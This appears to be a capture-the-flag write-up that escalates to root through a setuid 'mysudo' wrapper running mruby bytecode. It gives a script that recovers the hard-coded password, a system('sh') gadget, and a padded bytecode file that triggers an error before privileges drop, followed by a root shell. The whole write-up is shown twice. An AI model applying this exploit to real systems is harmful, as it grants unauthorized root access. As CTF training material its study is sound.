LoadLow/Readme.md

## Readme.md

      
    Raw
  

              Readme.md
            
          
    Static binary, PIE + ASLR + NX, probably not a BoF with a shellcode

I've exploited another BoF on the mruby file format / file reader

It was easier, I just had to trigger an error to avoid the setuid that drops privileges.

  
## gadget.rb
system("sh")

## recover_mysudo_passwd.py
src = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ \t\n\r"


dst = "\x9b\xb0\xf6^\xda0\xd5E\x89B\xbb\xc8\xfe\xb3\xa4\xc3\xa7\xfa\xee\xfc\xc9\xfd\x96\xf8\x8a\x93\xba\f\v+\x16\n\x01J-\xe7\x84Aqo(\x8e3\xc5w\xf7\xe5\xaf$&\x03\xdd91\x81\x8fD\xf1k6\xc2\x8c\xaa\xce\x9c\xa5\xbf\xae\xcc\xff\xf2\xb1\xd0\x99\x8d\xde\x87x\x12\xc1\xf4\xca\r_\xbd\x11@#\"\xb7>s\x9a\xe3\xacIZ\x97"


password_dst = [
    122, -111, -38, -11, -45, -11, -43, 90, 104, 36, 8, 91, 91, 91, 91
]

password_src = ""
for i in range(0, len(password_dst)):
    password_src += chr((password_dst[i] & 0xff) ^ 0xFE)

password_revd = ""
for i in range(0, len(password_src)):
    password_revd += src[dst.find(password_src[i])]

print("That's probably not the solution but ... " + str(password_revd)) # ADMsystem42$$$$

## reverse_encoder_mbr.bash
cp /app/main.mrb /tmp

mrdb -d main.mrb

r

e encode("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ \t\n\r")
  ret [0] "\x9b\xb0\xf6^\xda0\xd5E\x89B\xbb\xc8\xfe\xb3\xa4\xc3\xa7\xfa\xee\xfc\xc9\xfd\x96\xf8\x8a\x93\xba\f\v+\x16\n\x01J-\xe7\x84Aqo(\x8e3\xc5w\xf7\xe5\xaf$&\x03\xdd91\x81\x8fD\xf1k6\xc2\x8c\xaa\xce\x9c\xa5\xbf\xae\xcc\xff\xf2\xb1\xd0\x99\x8d\xde\x87x\x12\xc1\xf4\xca\r_\xbd\x11@#\"\xb7>s\x9a\xe3\xacIZ\x97"

## trigger_error_before_seteuid.bash
cd /tmp

vi gadget.rb

mrbc gadget.rb

echo "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
  >> gadget.mrb

/app/mysudo gadget
Password: ***************
/tmp # id
uid=0(root) gid=0(root) groups=0(root)
	src = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&\'()*+,-./:;<=>?@[\\]^_`{\|}~ \t\n\r"


	dst = "\x9b\xb0\xf6^\xda0\xd5E\x89B\xbb\xc8\xfe\xb3\xa4\xc3\xa7\xfa\xee\xfc\xc9\xfd\x96\xf8\x8a\x93\xba\f\v+\x16\n\x01J-\xe7\x84Aqo(\x8e3\xc5w\xf7\xe5\xaf$&\x03\xdd91\x81\x8fD\xf1k6\xc2\x8c\xaa\xce\x9c\xa5\xbf\xae\xcc\xff\xf2\xb1\xd0\x99\x8d\xde\x87x\x12\xc1\xf4\xca\r_\xbd\x11@#\"\xb7>s\x9a\xe3\xacIZ\x97"


	password_dst = [
	122, -111, -38, -11, -45, -11, -43, 90, 104, 36, 8, 91, 91, 91, 91
	]

	password_src = ""
	for i in range(0, len(password_dst)):
	password_src += chr((password_dst[i] & 0xff) ^ 0xFE)

	password_revd = ""
	for i in range(0, len(password_src)):
	password_revd += src[dst.find(password_src[i])]

	print("That's probably not the solution but ... " + str(password_revd)) # ADMsystem42$$$$
	cp /app/main.mrb /tmp

	mrdb -d main.mrb

	r

	e encode("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&\'()*+,-./:;<=>?@[\\]^_`{\|}~ \t\n\r")
	ret [0] "\x9b\xb0\xf6^\xda0\xd5E\x89B\xbb\xc8\xfe\xb3\xa4\xc3\xa7\xfa\xee\xfc\xc9\xfd\x96\xf8\x8a\x93\xba\f\v+\x16\n\x01J-\xe7\x84Aqo(\x8e3\xc5w\xf7\xe5\xaf$&\x03\xdd91\x81\x8fD\xf1k6\xc2\x8c\xaa\xce\x9c\xa5\xbf\xae\xcc\xff\xf2\xb1\xd0\x99\x8d\xde\x87x\x12\xc1\xf4\xca\r_\xbd\x11@#\"\xb7>s\x9a\xe3\xacIZ\x97"
	cd /tmp

	vi gadget.rb

	mrbc gadget.rb

	echo "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
	>> gadget.mrb

	/app/mysudo gadget
	Password: ***************
	/tmp # id
	uid=0(root) gid=0(root) groups=0(root)